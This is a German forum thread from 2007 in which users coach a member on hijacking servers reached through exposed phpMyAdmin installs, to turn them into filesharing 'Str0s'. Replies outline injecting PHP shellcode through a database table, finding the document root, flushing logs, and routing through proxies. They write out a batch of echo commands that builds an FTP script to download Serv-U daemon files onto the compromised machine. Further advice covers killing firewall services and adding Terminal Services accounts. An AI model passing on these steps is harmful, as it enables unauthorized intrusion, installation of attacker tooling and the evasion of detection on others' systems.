Str0 mit pma erstellen

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von EnjoX, 27. Mai 2007 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 27. Mai 2007
    Hi

    Ich weiß hacking requests sind verboten. Doch eig. ist das kein hacken, weil ich habe scannz bei dennen ich Adminrechte habe. Ich habe gegoogelt und hier im Board gesucht und ich habe nichts gefunden. Deshalb denke ich mir das man es nicht hier reinschreiben wird. Ich würde mich aber über eine PN freuen, in der erklärt ist wie man mit pma scannz einen Str0 erstellt.

    Wenn dieses Thread verboten ist bitte closen.

    mfg
     

  2. Anzeige
    Dealz: stark reduzierte Angebote finden.
  3. #2 27. Mai 2007
    AW: Str0 mit pma erstellen

    gegoogelt? nee

    Tipp: Shell

    Nein, dies ist kein Spam!
     
  4. #3 27. Mai 2007
    AW: Str0 mit pma erstellen

    super^^ tippt er das bei google ein, dann bekommt er seine shells... was hat er davon? NIX!

    solltest schon sagen/ nen tipp geben, wie er den shellcode in die datenbank bekommt^^

    ps: du "erstellst" keinen stro mit pma, sondern du "erstellst" dir nen stro durch phpmyadmin ;)

    mfg
     
  5. #4 27. Mai 2007
    AW: Str0 mit pma erstellen

    Wenn er den Shell erstmal drin hat isses ja leicht.. Das verdirbt ihm doch den Spaß ;)

    Also so weit bist du ja schon, du musst eine Shell in die Datenbank bringen & dann über die dadurch entstehende Kommando Zeile den FTP aufsetzen - like mssql ;)
     
  6. #5 27. Mai 2007
    AW: Str0 mit pma erstellen

    vorgehen:

    - neue db+table erstellen
    - phpshellcode in die table droppen
    - shell aufrufen (is nachher ungefähr wie msdos, nur eingeschränkt..)
    - don't forget to flush logs ^^

    greets
     
  7. #6 27. Mai 2007
    AW: Str0 mit pma erstellen

    bei der vorgehensweise von daedalus musst dir vorher noch das 'doc root' oder 'server path' translated (oder sonst was für nen pfad - hauptsache der pfad zum pma dir )suchen *gg* (das brauchst dann für den aufruf der shell)

    btw: wb to rr @ daedalus

    mfg
     
  8. #7 27. Mai 2007
    AW: Str0 mit pma erstellen

    Das DOCROOT bekommste durch phpinfo.php irgendwo in der mitte (Tipp: Suchfunktion von IE / FF).

    Fals es diese Datei nicht gibt (aus welchen Gründen auch immer ;)) musst du nen Fehler ausgeben lassen, wo der genaue Pfad von pma ausgegeben wird.

    Mit freundlichen Grüßen
     
  9. #8 28. Mai 2007
    AW: Str0 mit pma erstellen

    Danke für eure Antworten ich glaube ich bekomme es jetzt hin ihr habt alle eine BW bekommen thx
     
  10. #9 28. Mai 2007
    AW: Str0 mit pma erstellen

    kleiner tipp: proxy net vergessen *gg* wäre dort sehr angebracht (auch wenn du flush logs benutzt^^)

    mfg
     
  11. #10 28. Mai 2007
    Zuletzt von einem Moderator bearbeitet: 15. April 2017
    AW: Str0 mit pma erstellen

    Wollte noch meinen Senf zu dem Thema mit dem Proxy abgeben. Du kannst dir auf einen Stro, mit der Hilfe von bouncer.exe einen Socks5 Proxy erstellen. Wie du den dann in FireFox (o.Ä.) benutz erfährst du hier:
    Socks5 mit Firefox - RR:Board
     
  12. #11 28. Mai 2007
    AW: Str0 mit pma erstellen

    Hi

    Ich benutze einen Proxy aber danke für den Rat.

    Doch jetzt stehe ich erneut vor einem Problem.
    Ich habe jetzt die Serv-U dateien auf einen Pub geladen und möchte sie von diesem auf meinen Server bringen dazu geben ich folgendes ein:

    Echo Open [IP-Adresse] 21>>c:\FTP.txt
    Echo [Benutzername]>>c:\FTP.txt
    Echo [Passwort]>>c:\FTP.txt
    Echo Binary>>c:\FTP.txt
    Echo GET ServUDaemon.exe>>c:\FTP.txt
    Echo GET ServUDaemon.ini>>c:\FTP.txt
    Echo Quit>>c:\FTP.txt

    und dan zum Laden FTP.exe -s:c:\FTP.txt

    Doch es kommt immer eine fehlermeldung:


    Unknown host [Pub].
    Invalid command.
    Invalid command.
    Not connected.
    Not connected.
    Not connected.
    open [Pub]:21
    anonymous
    anonymous@lol.com
    BINARY
    get ServUDaemon.exe
    get ServUDaemon.ini
    quit


    was mache ich falsch ?
    Ich hoffe ihr wisst was ich flasch mache.

    mfg
     
  13. #12 28. Mai 2007
    AW: Str0 mit pma erstellen

    echo open 1.2.3.4>bla.txt
    echo user anonymous anon>>bla.txt
    echo BINARY>>bla.txt
    etc..

    so aufrufen: ftp -n -s:bla.txt
     
  14. #13 28. Mai 2007
    AW: Str0 mit pma erstellen

    Der Fehler kommt leider immer noch :( an was könnte das sonst noch liegen ?

    mfg
     
  15. #14 28. Mai 2007
    AW: Str0 mit pma erstellen

    du kannst auch nen ts acc. aufm server machen und so hacken.

    mfg
     
  16. #15 28. Mai 2007
    AW: Str0 mit pma erstellen

    Ich habe jetzt den Befehl mal an meinem eigenen PC ausprobiert, hier hat er funktioniert, außer das meine Firewall alarm geschlagen hat. Kann es sein das der Server eine Firewall hat und das er so blockt wenn ja, wie umgehe ich diese ?

    mfg
     
  17. #16 29. Mai 2007
    AW: Str0 mit pma erstellen

    wie immer
    Code:
    net start
    und schauen, ob ne fw als dienst drin ist. wenn ja, beenden. der fehler sieht mir aber nicht danach aus, denke einfach, dass ftp irgendwie deaktiviert wurde. aber gibts ja - bereits oft gesagt - noch viele andere möglichkeiten als ftp...
     
  18. #17 29. Mai 2007
    AW: Str0 mit pma erstellen

    Unknown host [Pub].
    Invalid command.
    Invalid command.
    Not connected.
    Not connected.
    Not connected.
    open [Pub]:21
    anonymous
    anonymous@lol.com
    BINARY
    get ServUDaemon.exe
    get ServUDaemon.ini
    quit

    => Lässt sich nun daraus schließen, dass die Dateien auf dem Server sind oder nicht?

    ServUDaemon installieren nicht vergessen ;)
     
  19. #18 29. Mai 2007
    AW: Str0 mit pma erstellen

    was hat das damit zu tun, ob die dateien bereits auf dem server sind? is hier auf jeden fall nicht ersichtlich. der kommt gar nicht dazu, überhaupt zu melden, dass die dateien bereits existieren, weil er nich mal den host erkennt...

    hast schon versucht, ne dns für die ip des pubs zu benutzen?
     
  20. #19 29. Mai 2007
    AW: Str0 mit pma erstellen

    lordosiris: Die Dateien sind leider nicht auf dem Server :(

    daedalus: Nein hab ich nicht versucht aber ich wüsste auch nicht wie das geht. Wäre nett wenn du mich aufklären würdest :D
     
  21. #20 30. Mai 2007
    AW: Str0 mit pma erstellen

    bei Managed DNS | Outsourced DNS | Anycast DNS nen account machen und die ip adden. aber wird wohl auch nix bringen, so wie ich das sehe. schon nen andern pub oder freespace (zB websamba.com) versucht? sonst setz halt nen rcp server auf (zB winqvt) und übertrag die dateien damit..
     
  22. #21 30. Mai 2007
    AW: Str0 mit pma erstellen

    was ich bei der Sache bloß net verstehe ist, warum kommt:
    Bevor da überhaupt der Command:
    ausgeführt wurde...

    kann es sein das die ftp.txt nicht richtig geschrieben ist?
    also das vor deinem open command schon was steht was aber nicht geht...
    zb
    open 12a.3.1.1 << also wo die IP falsch geschrieben wurde oder so...
     
  23. #22 30. Mai 2007
    AW: Str0 mit pma erstellen

    1. Port nicht per : anhängen, sondern mt Leerzeichen, also "open 127.0.0.1 13337"
    2. nicht user und pass in eine neue zeile sondern "user bla blub" machen
    3. ftp -n -s:ftp.txt
    4. mit type ftp.txt das script überprüfen
     
  24. #23 30. Mai 2007
    AW: Str0 mit pma erstellen

    denke nicht, dass das mit dem port der fehler war, denn:

    sonst dito.
     
  25. #24 4. Juni 2007
    AW: Str0 mit pma erstellen

    So ich gebe es auf ich bin einfach zu dumm. Ich habe es jetzt auf auf 3 Arten Probiert ich habe Probiert die FTP.exe wieder herzustellen hat alles nicht funktioniert es will einfach nicht ;)

    Aber danke für die Hilfe BW habt ihr alle so weit es ging :)
     
  26. #25 4. Juni 2007
    AW: Str0 mit pma erstellen

    Naja...

    wie gesagt schon nen Terminal Service acc erstellt?
    Ansonsten nimm halt den nächsten scan.... ^^°
    btw unterstützen gute shells auch gleich down und uppload sodass du nicht erst über einen Pub gehen musst....
     

  27. Videos zum Thema
Die Seite wird geladen...
Similar Threads - Str0 pma erstellen
  1. Antworten:
    0
    Aufrufe:
    635
  2. Wie an Str0s kommen?

    Locke der Bo$$ , 8. Juli 2010 , im Forum: Filesharing
    Antworten:
    11
    Aufrufe:
    3.593
  3. Frage bzgl. Sniffen und Str0s

    enteka , 29. November 2009 , im Forum: Filesharing
    Antworten:
    6
    Aufrufe:
    841
  4. Antworten:
    2
    Aufrufe:
    780
  5. PubStr0

    king_dave , 14. Juli 2009 , im Forum: Filesharing
    Antworten:
    3
    Aufrufe:
    438